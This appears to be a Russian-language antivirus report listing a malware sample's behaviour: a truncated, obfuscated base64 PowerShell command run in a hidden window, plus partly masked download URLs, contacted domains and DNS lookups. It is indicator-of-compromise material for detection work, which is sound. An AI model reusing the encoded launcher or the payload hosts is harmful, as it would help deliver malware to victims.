Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAgACQAWQAwAEcAdAA9ACAAWwBUAFkAUABlAF0AKAAiAHsAMwB9AHsAMAB9AHsAMQB9AHsAMgB9ACIALQBmACAAJwBpAFIAZQBDAHQAbwAnACwAJwBSACcALAAnAFkAJwAsACcAUwB5AFMAVABFAG0ALgBpAG8ALgBkACcAKQ...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1552
- %TEMP%\1172004.cvr
- 'ro#####presshair.com':80
- 'ro#####presshair.com':443
- 'kb###.ilmci.com':80
- '03##hhd.com':80
- 'so#####e-capital.com':443
- 'di####lklinik.com':443
- 'qu#####mathtutors.com':443
- http://www.ro#####presshair.com/wp-content/upgrade/Ete/
- http://03##hhd.com/cgi-bin/q/
- http://ww##.#377hhd.com/cgi-bin/q/
- 'ro#####presshair.com':443
- 'so#####e-capital.com':443
- 'di####lklinik.com':443
- 'qu#####mathtutors.com':443
- DNS ASK ro#####presshair.com
- DNS ASK kb###.ilmci.com
- DNS ASK ti###bor.com
- DNS ASK 03##hhd.com
- DNS ASK ww##.#377hhd.com
- DNS ASK so#####e-capital.com
- DNS ASK di####lklinik.com
- DNS ASK qu#####mathtutors.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAgACQAWQAwAEcAdAA9ACAAWwBUAFkAUABlAF0AKAAiAHsAMwB9AHsAMAB9AHsAMQB9AHsAMgB9ACIALQBmACAAJwBpAFIAZQBDAHQAbwAnACwAJwBSACcALAAnAFkAJwAsACcAUwB5AFMAVABFAG0ALgBpAG8ALgBkACcAKQ...' (со скрытым окном)